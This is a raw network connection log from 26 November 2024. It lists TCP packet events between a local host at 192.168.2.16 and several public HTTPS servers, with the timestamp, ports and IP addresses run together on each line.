                                                                              Nov 26, 2024 20:54:31.817064047 CET49714443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:54:31.855338097 CET44349717162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:31.958163023 CET49673443192.168.2.16204.79.197.203
                                                                              Nov 26, 2024 20:54:32.187201977 CET4434971435.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:54:32.187434912 CET4434971435.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:54:32.187500000 CET49714443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:54:32.187530994 CET49714443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:54:32.187546968 CET4434971435.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:54:32.187556028 CET49714443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:54:32.187592983 CET49714443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:54:32.188114882 CET49720443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:54:32.188148022 CET4434972035.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:54:32.188222885 CET49720443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:54:32.188441992 CET49720443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:54:32.188457966 CET4434972035.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:54:32.285356998 CET44349717162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:32.285423040 CET44349717162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:32.285479069 CET49717443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:32.286098003 CET49717443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:32.286113024 CET44349717162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:32.287600040 CET49721443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:32.287635088 CET44349721162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:32.287822008 CET49721443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:32.288094044 CET49721443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:32.288109064 CET44349721162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:32.357872963 CET443497182.18.84.141192.168.2.16
                                                                              Nov 26, 2024 20:54:32.357954979 CET49718443192.168.2.162.18.84.141
                                                                              Nov 26, 2024 20:54:32.359168053 CET49718443192.168.2.162.18.84.141
                                                                              Nov 26, 2024 20:54:32.359175920 CET443497182.18.84.141192.168.2.16
                                                                              Nov 26, 2024 20:54:32.359407902 CET443497182.18.84.141192.168.2.16
                                                                              Nov 26, 2024 20:54:32.360465050 CET49718443192.168.2.162.18.84.141
                                                                              Nov 26, 2024 20:54:32.403342009 CET443497182.18.84.141192.168.2.16
                                                                              Nov 26, 2024 20:54:32.416589975 CET44349716162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:32.416687012 CET44349716162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:32.416749954 CET49716443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:32.417361975 CET49716443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:32.417380095 CET44349716162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:32.423902035 CET49722443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:32.423921108 CET44349722162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:32.423996925 CET49722443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:32.424336910 CET49722443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:32.424349070 CET44349722162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:32.913178921 CET49678443192.168.2.1620.189.173.10
                                                                              Nov 26, 2024 20:54:32.921055079 CET443497182.18.84.141192.168.2.16
                                                                              Nov 26, 2024 20:54:32.921116114 CET443497182.18.84.141192.168.2.16
                                                                              Nov 26, 2024 20:54:32.921260118 CET49718443192.168.2.162.18.84.141
                                                                              Nov 26, 2024 20:54:32.921921015 CET49718443192.168.2.162.18.84.141
                                                                              Nov 26, 2024 20:54:32.921935081 CET443497182.18.84.141192.168.2.16
                                                                              Nov 26, 2024 20:54:32.921957970 CET49718443192.168.2.162.18.84.141
                                                                              Nov 26, 2024 20:54:32.921962976 CET443497182.18.84.141192.168.2.16
                                                                              Nov 26, 2024 20:54:33.448518991 CET4434972035.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:54:33.448879004 CET49720443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:54:33.448895931 CET4434972035.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:54:33.449384928 CET4434972035.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:54:33.449697971 CET49720443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:54:33.449790955 CET4434972035.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:54:33.449858904 CET49720443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:54:33.474307060 CET443497194.245.163.56192.168.2.16
                                                                              Nov 26, 2024 20:54:33.474385977 CET49719443192.168.2.164.245.163.56
                                                                              Nov 26, 2024 20:54:33.476130962 CET49719443192.168.2.164.245.163.56
                                                                              Nov 26, 2024 20:54:33.476140976 CET443497194.245.163.56192.168.2.16
                                                                              Nov 26, 2024 20:54:33.476381063 CET443497194.245.163.56192.168.2.16
                                                                              Nov 26, 2024 20:54:33.495328903 CET4434972035.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:54:33.503207922 CET49720443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:54:33.519160986 CET49719443192.168.2.164.245.163.56
                                                                              Nov 26, 2024 20:54:33.534300089 CET49719443192.168.2.164.245.163.56
                                                                              Nov 26, 2024 20:54:33.543431044 CET44349721162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:33.543704033 CET49721443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:33.543728113 CET44349721162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:33.544070005 CET44349721162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:33.544487000 CET49721443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:33.544559002 CET44349721162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:33.544655085 CET49721443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:33.579329967 CET443497194.245.163.56192.168.2.16
                                                                              Nov 26, 2024 20:54:33.591327906 CET44349721162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:33.687171936 CET44349722162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:33.687444925 CET49722443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:33.687454939 CET44349722162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:33.687761068 CET44349722162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:33.688091993 CET49722443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:33.688149929 CET44349722162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:33.688242912 CET49722443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:33.735327005 CET44349722162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:33.924015999 CET4434972035.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:54:33.924246073 CET4434972035.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:54:33.924360037 CET49720443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:54:33.924438000 CET49720443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:54:33.924463034 CET4434972035.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:54:33.924480915 CET49720443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:54:33.924540043 CET49720443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:54:34.148407936 CET44349722162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:34.148631096 CET44349722162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:34.148659945 CET44349722162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:34.148679018 CET49722443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:34.148689985 CET44349722162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:34.148715973 CET44349722162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:34.148751020 CET49722443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:34.148757935 CET44349722162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:34.148957014 CET49722443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:34.149339914 CET44349722162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:34.156888008 CET44349722162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:34.156948090 CET49722443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:34.156955004 CET44349722162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:34.156972885 CET44349722162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:34.157028913 CET49722443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:34.157121897 CET49722443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:34.157133102 CET44349722162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:34.228297949 CET443497194.245.163.56192.168.2.16
                                                                              Nov 26, 2024 20:54:34.228318930 CET443497194.245.163.56192.168.2.16
                                                                              Nov 26, 2024 20:54:34.228326082 CET443497194.245.163.56192.168.2.16
                                                                              Nov 26, 2024 20:54:34.228334904 CET443497194.245.163.56192.168.2.16
                                                                              Nov 26, 2024 20:54:34.228359938 CET443497194.245.163.56192.168.2.16
                                                                              Nov 26, 2024 20:54:34.228447914 CET49719443192.168.2.164.245.163.56
                                                                              Nov 26, 2024 20:54:34.228447914 CET49719443192.168.2.164.245.163.56
                                                                              Nov 26, 2024 20:54:34.228461981 CET443497194.245.163.56192.168.2.16
                                                                              Nov 26, 2024 20:54:34.228511095 CET49719443192.168.2.164.245.163.56
                                                                              Nov 26, 2024 20:54:34.231733084 CET49723443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:34.231761932 CET44349723162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:34.231843948 CET49723443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:34.232166052 CET49723443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:34.232180119 CET44349723162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:34.270363092 CET443497194.245.163.56192.168.2.16
                                                                              Nov 26, 2024 20:54:34.270428896 CET443497194.245.163.56192.168.2.16
                                                                              Nov 26, 2024 20:54:34.270438910 CET49719443192.168.2.164.245.163.56
                                                                              Nov 26, 2024 20:54:34.270478010 CET49719443192.168.2.164.245.163.56
                                                                              Nov 26, 2024 20:54:34.270576000 CET49719443192.168.2.164.245.163.56
                                                                              Nov 26, 2024 20:54:34.270586014 CET443497194.245.163.56192.168.2.16
                                                                              Nov 26, 2024 20:54:34.270593882 CET49719443192.168.2.164.245.163.56
                                                                              Nov 26, 2024 20:54:34.270598888 CET443497194.245.163.56192.168.2.16
                                                                              Nov 26, 2024 20:54:34.291066885 CET44349721162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:34.291114092 CET44349721162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:34.291177988 CET49721443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:34.291189909 CET44349721162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:34.291199923 CET44349721162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:34.291250944 CET49721443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:34.292141914 CET49721443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:34.292150021 CET44349721162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:34.325691938 CET49724443192.168.2.16172.66.0.158
                                                                              Nov 26, 2024 20:54:34.325742960 CET44349724172.66.0.158192.168.2.16
                                                                              Nov 26, 2024 20:54:34.325840950 CET49724443192.168.2.16172.66.0.158
                                                                              Nov 26, 2024 20:54:34.326253891 CET49724443192.168.2.16172.66.0.158
                                                                              Nov 26, 2024 20:54:34.326281071 CET44349724172.66.0.158192.168.2.16
                                                                              Nov 26, 2024 20:54:34.391282082 CET49725443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:34.391303062 CET44349725162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:34.391371965 CET49725443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:34.391928911 CET49725443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:34.391943932 CET44349725162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:34.933496952 CET49726443192.168.2.16172.67.180.192
                                                                              Nov 26, 2024 20:54:34.933532953 CET44349726172.67.180.192192.168.2.16
                                                                              Nov 26, 2024 20:54:34.933687925 CET49726443192.168.2.16172.67.180.192
                                                                              Nov 26, 2024 20:54:34.933875084 CET49727443192.168.2.16172.67.180.192
                                                                              Nov 26, 2024 20:54:34.933911085 CET44349727172.67.180.192192.168.2.16
                                                                              Nov 26, 2024 20:54:34.933981895 CET49727443192.168.2.16172.67.180.192
                                                                              Nov 26, 2024 20:54:34.934216022 CET49726443192.168.2.16172.67.180.192
                                                                              Nov 26, 2024 20:54:34.934228897 CET44349726172.67.180.192192.168.2.16
                                                                              Nov 26, 2024 20:54:34.934516907 CET49727443192.168.2.16172.67.180.192
                                                                              Nov 26, 2024 20:54:34.934534073 CET44349727172.67.180.192192.168.2.16
                                                                              Nov 26, 2024 20:54:35.280025959 CET4968080192.168.2.16192.229.211.108
                                                                              Nov 26, 2024 20:54:35.327182055 CET49678443192.168.2.1620.189.173.10
                                                                              Nov 26, 2024 20:54:35.531675100 CET44349723162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:35.531992912 CET49723443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:35.532016993 CET44349723162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:35.532332897 CET44349723162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:35.532816887 CET49723443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:35.532867908 CET44349723162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:35.533036947 CET49723443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:35.533133984 CET49723443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:35.533165932 CET44349723162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:35.533230066 CET49723443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:35.543207884 CET44349724172.66.0.158192.168.2.16
                                                                              Nov 26, 2024 20:54:35.543498039 CET49724443192.168.2.16172.66.0.158
                                                                              Nov 26, 2024 20:54:35.543520927 CET44349724172.66.0.158192.168.2.16
                                                                              Nov 26, 2024 20:54:35.544550896 CET44349724172.66.0.158192.168.2.16
                                                                              Nov 26, 2024 20:54:35.544615030 CET49724443192.168.2.16172.66.0.158
                                                                              Nov 26, 2024 20:54:35.545633078 CET49724443192.168.2.16172.66.0.158
                                                                              Nov 26, 2024 20:54:35.545660973 CET49724443192.168.2.16172.66.0.158
                                                                              Nov 26, 2024 20:54:35.545701027 CET44349724172.66.0.158192.168.2.16
                                                                              Nov 26, 2024 20:54:35.545747995 CET49724443192.168.2.16172.66.0.158
                                                                              Nov 26, 2024 20:54:35.545763969 CET49724443192.168.2.16172.66.0.158
                                                                              Nov 26, 2024 20:54:35.546134949 CET49728443192.168.2.16172.66.0.158
                                                                              Nov 26, 2024 20:54:35.546171904 CET44349728172.66.0.158192.168.2.16
                                                                              Nov 26, 2024 20:54:35.546243906 CET49728443192.168.2.16172.66.0.158
                                                                              Nov 26, 2024 20:54:35.546444893 CET49728443192.168.2.16172.66.0.158
                                                                              Nov 26, 2024 20:54:35.546458960 CET44349728172.66.0.158192.168.2.16
                                                                              Nov 26, 2024 20:54:35.579332113 CET44349723162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:35.583184004 CET4968080192.168.2.16192.229.211.108
                                                                              Nov 26, 2024 20:54:35.612411022 CET44349725162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:35.612700939 CET49725443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:35.612724066 CET44349725162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:35.613029957 CET44349725162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:35.613359928 CET49725443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:35.613426924 CET44349725162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:35.661139011 CET49725443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:36.078726053 CET44349723162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:36.078876019 CET44349723162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:36.078984022 CET49723443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:36.079693079 CET49723443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:36.079715014 CET44349723162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:36.083317995 CET49729443192.168.2.16172.66.0.158
                                                                              Nov 26, 2024 20:54:36.083353043 CET44349729172.66.0.158192.168.2.16
                                                                              Nov 26, 2024 20:54:36.083448887 CET49729443192.168.2.16172.66.0.158
                                                                              Nov 26, 2024 20:54:36.083724976 CET49729443192.168.2.16172.66.0.158
                                                                              Nov 26, 2024 20:54:36.083738089 CET44349729172.66.0.158192.168.2.16
                                                                              Nov 26, 2024 20:54:36.149358988 CET44349726172.67.180.192192.168.2.16
                                                                              Nov 26, 2024 20:54:36.151268005 CET49726443192.168.2.16172.67.180.192
                                                                              Nov 26, 2024 20:54:36.151276112 CET44349726172.67.180.192192.168.2.16
                                                                              Nov 26, 2024 20:54:36.152333975 CET44349726172.67.180.192192.168.2.16
                                                                              Nov 26, 2024 20:54:36.152409077 CET49726443192.168.2.16172.67.180.192
                                                                              Nov 26, 2024 20:54:36.152745008 CET49726443192.168.2.16172.67.180.192
                                                                              Nov 26, 2024 20:54:36.152756929 CET49726443192.168.2.16172.67.180.192
                                                                              Nov 26, 2024 20:54:36.152802944 CET49726443192.168.2.16172.67.180.192
                                                                              Nov 26, 2024 20:54:36.152810097 CET44349726172.67.180.192192.168.2.16
                                                                              Nov 26, 2024 20:54:36.152869940 CET49726443192.168.2.16172.67.180.192
                                                                              Nov 26, 2024 20:54:36.153090954 CET49730443192.168.2.16172.67.180.192
                                                                              Nov 26, 2024 20:54:36.153134108 CET44349730172.67.180.192192.168.2.16
                                                                              Nov 26, 2024 20:54:36.153215885 CET49730443192.168.2.16172.67.180.192
                                                                              Nov 26, 2024 20:54:36.153407097 CET49730443192.168.2.16172.67.180.192
                                                                              Nov 26, 2024 20:54:36.153418064 CET44349730172.67.180.192192.168.2.16
                                                                              Nov 26, 2024 20:54:36.187190056 CET4968080192.168.2.16192.229.211.108
                                                                              Nov 26, 2024 20:54:36.195897102 CET44349727172.67.180.192192.168.2.16
                                                                              Nov 26, 2024 20:54:36.198539972 CET49727443192.168.2.16172.67.180.192
                                                                              Nov 26, 2024 20:54:36.198554039 CET44349727172.67.180.192192.168.2.16
                                                                              Nov 26, 2024 20:54:36.199698925 CET44349727172.67.180.192192.168.2.16
                                                                              Nov 26, 2024 20:54:36.199770927 CET49727443192.168.2.16172.67.180.192
                                                                              Nov 26, 2024 20:54:36.200133085 CET49727443192.168.2.16172.67.180.192
                                                                              Nov 26, 2024 20:54:36.200149059 CET49727443192.168.2.16172.67.180.192
                                                                              Nov 26, 2024 20:54:36.200192928 CET44349727172.67.180.192192.168.2.16
                                                                              Nov 26, 2024 20:54:36.200196981 CET49727443192.168.2.16172.67.180.192
                                                                              Nov 26, 2024 20:54:36.200246096 CET49727443192.168.2.16172.67.180.192
                                                                              Nov 26, 2024 20:54:36.200476885 CET49731443192.168.2.16172.67.180.192
                                                                              Nov 26, 2024 20:54:36.200499058 CET44349731172.67.180.192192.168.2.16
                                                                              Nov 26, 2024 20:54:36.200562000 CET49731443192.168.2.16172.67.180.192
                                                                              Nov 26, 2024 20:54:36.200773001 CET49731443192.168.2.16172.67.180.192
                                                                              Nov 26, 2024 20:54:36.200783968 CET44349731172.67.180.192192.168.2.16
                                                                              Nov 26, 2024 20:54:36.972990990 CET44349728172.66.0.158192.168.2.16
                                                                              Nov 26, 2024 20:54:36.973256111 CET49728443192.168.2.16172.66.0.158
                                                                              Nov 26, 2024 20:54:36.973284006 CET44349728172.66.0.158192.168.2.16
                                                                              Nov 26, 2024 20:54:36.974284887 CET44349728172.66.0.158192.168.2.16
                                                                              Nov 26, 2024 20:54:36.974354982 CET49728443192.168.2.16172.66.0.158
                                                                              Nov 26, 2024 20:54:36.974632978 CET49728443192.168.2.16172.66.0.158
                                                                              Nov 26, 2024 20:54:36.974705935 CET44349728172.66.0.158192.168.2.16
                                                                              Nov 26, 2024 20:54:36.974809885 CET49728443192.168.2.16172.66.0.158
                                                                              Nov 26, 2024 20:54:37.018163919 CET49728443192.168.2.16172.66.0.158
                                                                              Nov 26, 2024 20:54:37.018172026 CET44349728172.66.0.158192.168.2.16
                                                                              Nov 26, 2024 20:54:37.066149950 CET49728443192.168.2.16172.66.0.158
                                                                              Nov 26, 2024 20:54:37.386370897 CET44349729172.66.0.158192.168.2.16
                                                                              Nov 26, 2024 20:54:37.386636972 CET49729443192.168.2.16172.66.0.158
                                                                              Nov 26, 2024 20:54:37.386655092 CET44349729172.66.0.158192.168.2.16
                                                                              Nov 26, 2024 20:54:37.387675047 CET44349729172.66.0.158192.168.2.16
                                                                              Nov 26, 2024 20:54:37.387742996 CET49729443192.168.2.16172.66.0.158
                                                                              Nov 26, 2024 20:54:37.388029099 CET49729443192.168.2.16172.66.0.158
                                                                              Nov 26, 2024 20:54:37.388040066 CET49729443192.168.2.16172.66.0.158
                                                                              Nov 26, 2024 20:54:37.388087034 CET44349729172.66.0.158192.168.2.16
                                                                              Nov 26, 2024 20:54:37.388088942 CET49729443192.168.2.16172.66.0.158
                                                                              Nov 26, 2024 20:54:37.388154030 CET49729443192.168.2.16172.66.0.158
                                                                              Nov 26, 2024 20:54:37.388420105 CET49732443192.168.2.16172.66.0.158
                                                                              Nov 26, 2024 20:54:37.388465881 CET44349732172.66.0.158192.168.2.16
                                                                              Nov 26, 2024 20:54:37.388544083 CET49732443192.168.2.16172.66.0.158
                                                                              Nov 26, 2024 20:54:37.388751030 CET49732443192.168.2.16172.66.0.158
                                                                              Nov 26, 2024 20:54:37.388766050 CET44349732172.66.0.158192.168.2.16
                                                                              Nov 26, 2024 20:54:37.400242090 CET4968080192.168.2.16192.229.211.108
                                                                              Nov 26, 2024 20:54:37.419894934 CET44349730172.67.180.192192.168.2.16
                                                                              Nov 26, 2024 20:54:37.420156956 CET49730443192.168.2.16172.67.180.192
                                                                              Nov 26, 2024 20:54:37.420185089 CET44349730172.67.180.192192.168.2.16
                                                                              Nov 26, 2024 20:54:37.420222044 CET44349731172.67.180.192192.168.2.16
                                                                              Nov 26, 2024 20:54:37.420397043 CET49731443192.168.2.16172.67.180.192
                                                                              Nov 26, 2024 20:54:37.420411110 CET44349731172.67.180.192192.168.2.16
                                                                              Nov 26, 2024 20:54:37.421492100 CET44349731172.67.180.192192.168.2.16
                                                                              Nov 26, 2024 20:54:37.421561956 CET49731443192.168.2.16172.67.180.192
                                                                              Nov 26, 2024 20:54:37.421844959 CET44349730172.67.180.192192.168.2.16
                                                                              Nov 26, 2024 20:54:37.421905994 CET49730443192.168.2.16172.67.180.192
                                                                              Nov 26, 2024 20:54:37.422542095 CET49731443192.168.2.16172.67.180.192
                                                                              Nov 26, 2024 20:54:37.422619104 CET44349731172.67.180.192192.168.2.16
                                                                              Nov 26, 2024 20:54:37.422771931 CET49731443192.168.2.16172.67.180.192
                                                                              Nov 26, 2024 20:54:37.422780037 CET44349731172.67.180.192192.168.2.16
                                                                              Nov 26, 2024 20:54:37.422863960 CET49730443192.168.2.16172.67.180.192
                                                                              Nov 26, 2024 20:54:37.423053980 CET44349730172.67.180.192192.168.2.16
                                                                              Nov 26, 2024 20:54:37.450200081 CET44349728172.66.0.158192.168.2.16
                                                                              Nov 26, 2024 20:54:37.450262070 CET44349728172.66.0.158192.168.2.16
                                                                              Nov 26, 2024 20:54:37.450352907 CET49728443192.168.2.16172.66.0.158
                                                                              Nov 26, 2024 20:54:37.450380087 CET44349728172.66.0.158192.168.2.16
                                                                              Nov 26, 2024 20:54:37.450645924 CET44349728172.66.0.158192.168.2.16
                                                                              Nov 26, 2024 20:54:37.450695992 CET49728443192.168.2.16172.66.0.158
                                                                              Nov 26, 2024 20:54:37.450705051 CET44349728172.66.0.158192.168.2.16
                                                                              Nov 26, 2024 20:54:37.451654911 CET44349728172.66.0.158192.168.2.16
                                                                              Nov 26, 2024 20:54:37.451708078 CET49728443192.168.2.16172.66.0.158
                                                                              Nov 26, 2024 20:54:37.451720953 CET44349728172.66.0.158192.168.2.16
                                                                              Nov 26, 2024 20:54:37.458930969 CET44349728172.66.0.158192.168.2.16
                                                                              Nov 26, 2024 20:54:37.459012032 CET49728443192.168.2.16172.66.0.158
                                                                              Nov 26, 2024 20:54:37.459026098 CET44349728172.66.0.158192.168.2.16
                                                                              Nov 26, 2024 20:54:37.459078074 CET49728443192.168.2.16172.66.0.158
                                                                              Nov 26, 2024 20:54:37.459273100 CET49728443192.168.2.16172.66.0.158
                                                                              Nov 26, 2024 20:54:37.459290981 CET44349728172.66.0.158192.168.2.16
                                                                              Nov 26, 2024 20:54:37.462192059 CET49731443192.168.2.16172.67.180.192
                                                                              Nov 26, 2024 20:54:37.478209972 CET49730443192.168.2.16172.67.180.192
                                                                              Nov 26, 2024 20:54:37.478245020 CET44349730172.67.180.192192.168.2.16
                                                                              Nov 26, 2024 20:54:37.526211023 CET49730443192.168.2.16172.67.180.192
                                                                              Nov 26, 2024 20:54:38.301986933 CET44349731172.67.180.192192.168.2.16
                                                                              Nov 26, 2024 20:54:38.302128077 CET44349731172.67.180.192192.168.2.16
                                                                              Nov 26, 2024 20:54:38.302218914 CET49731443192.168.2.16172.67.180.192
                                                                              Nov 26, 2024 20:54:38.302237988 CET44349731172.67.180.192192.168.2.16
                                                                              Nov 26, 2024 20:54:38.310636997 CET44349731172.67.180.192192.168.2.16
                                                                              Nov 26, 2024 20:54:38.310688972 CET44349731172.67.180.192192.168.2.16
                                                                              Nov 26, 2024 20:54:38.310703993 CET49731443192.168.2.16172.67.180.192
                                                                              Nov 26, 2024 20:54:38.310713053 CET44349731172.67.180.192192.168.2.16
                                                                              Nov 26, 2024 20:54:38.310758114 CET49731443192.168.2.16172.67.180.192
                                                                              Nov 26, 2024 20:54:38.319138050 CET44349731172.67.180.192192.168.2.16
                                                                              Nov 26, 2024 20:54:38.327620029 CET44349731172.67.180.192192.168.2.16
                                                                              Nov 26, 2024 20:54:38.327698946 CET49731443192.168.2.16172.67.180.192
                                                                              Nov 26, 2024 20:54:38.327708006 CET44349731172.67.180.192192.168.2.16
                                                                              Nov 26, 2024 20:54:38.373197079 CET49731443192.168.2.16172.67.180.192
                                                                              Nov 26, 2024 20:54:38.373205900 CET44349731172.67.180.192192.168.2.16
                                                                              Nov 26, 2024 20:54:38.421156883 CET49731443192.168.2.16172.67.180.192
                                                                              Nov 26, 2024 20:54:38.425487041 CET44349731172.67.180.192192.168.2.16
                                                                              Nov 26, 2024 20:54:38.469225883 CET49731443192.168.2.16172.67.180.192
                                                                              Nov 26, 2024 20:54:38.469233990 CET44349731172.67.180.192192.168.2.16
                                                                              Nov 26, 2024 20:54:38.497679949 CET44349731172.67.180.192192.168.2.16
                                                                              Nov 26, 2024 20:54:38.497782946 CET49731443192.168.2.16172.67.180.192
                                                                              Nov 26, 2024 20:54:38.497791052 CET44349731172.67.180.192192.168.2.16
                                                                              Nov 26, 2024 20:54:38.505780935 CET44349731172.67.180.192192.168.2.16
                                                                              Nov 26, 2024 20:54:38.505882025 CET49731443192.168.2.16172.67.180.192
                                                                              Nov 26, 2024 20:54:38.505888939 CET44349731172.67.180.192192.168.2.16
                                                                              Nov 26, 2024 20:54:38.508930922 CET44349731172.67.180.192192.168.2.16
                                                                              Nov 26, 2024 20:54:38.509028912 CET49731443192.168.2.16172.67.180.192
                                                                              Nov 26, 2024 20:54:38.509171963 CET49731443192.168.2.16172.67.180.192
                                                                              Nov 26, 2024 20:54:38.509187937 CET44349731172.67.180.192192.168.2.16
                                                                              Nov 26, 2024 20:54:38.704531908 CET49733443192.168.2.16104.17.24.14
                                                                              Nov 26, 2024 20:54:38.704576969 CET44349733104.17.24.14192.168.2.16
                                                                              Nov 26, 2024 20:54:38.704660892 CET49733443192.168.2.16104.17.24.14
                                                                              Nov 26, 2024 20:54:38.704817057 CET49734443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:38.704823971 CET44349734104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:38.704987049 CET49734443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:38.705053091 CET49735443192.168.2.16151.101.2.137
                                                                              Nov 26, 2024 20:54:38.705116987 CET44349735151.101.2.137192.168.2.16
